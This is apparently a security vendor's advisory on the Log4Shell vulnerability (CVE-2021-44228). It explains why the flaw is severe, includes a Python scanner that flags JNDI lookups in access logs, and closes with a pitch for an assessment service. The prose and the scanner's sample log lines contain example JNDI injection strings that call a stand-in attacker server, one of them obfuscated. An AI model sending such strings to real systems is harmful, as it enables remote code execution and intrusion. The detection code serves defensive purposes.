Log4j vulnerability: An update from InfoSystems' Cyber Services Team

The InfoSystems Cyber Services team has been working diligently the past week researching and analyzing the new CVE-2021-44228 vulnerability, commonly known as Log4j or Log4Shell. Log4j is a widely used Java logging library prevalent in many different software applications and cloud services.

On December 9, 2021, the Log4j Java library was found to suffer from a critical remote code execution vulnerability. This vulnerability is rated with the highest severity rating of 10.0, and if exploited, allows attackers the ability to take full control of the impacted system.

Initial research into the exploit suggested attackers were leveraging the vulnerability to install crypto-mining software, a tactic known as cryptojacking. Cryptojacking is considered a serious cyber event, but it is typically not as destructive as ransomware or the other malware InfoSystems has observed recently. In recent days, attackers have been exploiting Log4j to install Cobalt Strike and other remote access toolkits, which are extremely dangerous ransomware precursors. InfoSystems’ Cyber Services team has witnessed increasing levels of exploitation in the wild, and more ransomware attacks are sure to follow as a result.

Log4j is one of the most severe vulnerabilities InfoSystems has observed in recent years for the following reasons:

  • The vulnerable Java code is extremely easy to exploit and extremely prevalent: it is used by thousands of applications and cloud services across the globe
  • Because of that prevalence, identifying and patching all vulnerable systems is no easy task for cybersecurity teams
  • It is high-impact: this vulnerability allows for full remote code execution. Remote code execution attacks can give the adversary unauthorized access to systems where they can make changes, run executable software, install malware, and/or exfiltrate sensitive company data
  • Instructions on how to perform the exploit are publicly available
  • The attacker simply needs to prepare a malicious Java file, store it on a server they control, and include the following string in any data that will be logged by the application server: ${jndi:ldap://attackers-server.com/malicious-java-file}
  • When the vulnerable server logs this string, Log4j will retrieve and execute Java code from an attacker-controlled server, allowing arbitrary code execution. If the code is a remote shell, the attacker will obtain a local shell with the privileges of the system user running the vulnerable application.
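As an added illustration of the hunting described in this post (example code written for this page, not InfoSystems' tooling), the following Python scanner reads web-server log lines and flags any request whose logged data carries a `${jndi:...}` lookup like the string above. The log lines and the host name `attackers-server.example` are constructed sample data; the scanner also folds simple nested `${lower:...}`/`${upper:...}` lookups first, because a check that only matches the literal text `${jndi:` would otherwise miss a lookup that Log4j itself would still resolve.

```python
import re

# Constructed sample access-log lines (not taken from any real system).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 318 "-" "${jndi:ldap://attackers-server.example/malicious-java-file}"
10.0.0.9 - - [10/Dec/2021:10:01:08 +0000] "GET /api HTTP/1.1" 200 120 "-" "${${lower:j}ndi:rmi://attackers-server.example/a}"
10.0.0.7 - - [10/Dec/2021:10:01:10 +0000] "GET /docs HTTP/1.1" 200 900 "-" "curl/7.79"
"""

# Innermost lower/upper lookups that Log4j resolves before the outer ${jndi:...}.
_INNER = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# The JNDI lookup itself; group 1 captures the protocol (ldap, rmi, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text):
    """Resolve nested lower/upper lookups from the inside out until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _INNER.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
    return text


def find_jndi_lookups(log_text):
    """Return (line_number, protocol, original_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower(), line))
    return hits


if __name__ == "__main__":
    for number, protocol, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: jndi lookup over {protocol}: {line}")
```

A hit in an access log shows that the string was submitted, not that the lookup succeeded; outbound LDAP/RMI connections from the application host around the same timestamp are the corroborating evidence to look for.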

The InfoSystems Cyber Services team is currently reviewing our supported products for impact and evaluating options for remediation and/or mitigation. This includes implementing additional proactive measures within InfoSystems and customer internal environments to address the dynamic threats related to CVE-2021-44228.

InfoSystems has not observed successful exploitation of the Log4j vulnerability within our private cloud or customer networks. InfoSystems has also not observed successful exploitation of the Log4j vulnerability within our internal environment. InfoSystems will remain vigilant in threat hunting and deep analysis of the Log4j vulnerability. InfoSystems is actively hunting for indicators of compromise and evidence of vulnerable systems, and is reporting this information to customers and partners through private channels.

InfoSystems recommends mitigating any vulnerable systems as soon as possible. Security patches and workarounds are now available for most systems. Please refer to the appropriate vendor documentation for specific instructions on how to remediate the vulnerable systems.

InfoSystems also recommends performing a comprehensive Security Impact Review (SIR) of internal and external environments. This no-cost IT assessment identifies vulnerabilities in your network and IT infrastructure that could lead to a cybersecurity breach. InfoSystems specialists assess your risk, identify areas in need of improvement, and provide remediation recommendations for any discovered cybersecurity deficiencies.

Contact our team today to schedule a Security Impact Review.

About InfoSystems

For over 25 years, InfoSystems has provided reliable IT solutions to build and maintain strong and secure systems for both SMB and enterprise organizations. Headquartered in Chattanooga, TN, our trusted team of experts specializes in traditional infrastructure, IT optimization and cybersecurity services, as well as next-gen solutions such as hybrid cloud and automation, from partners such as IBM, Red Hat, Dell Technologies, Microsoft and VMware.
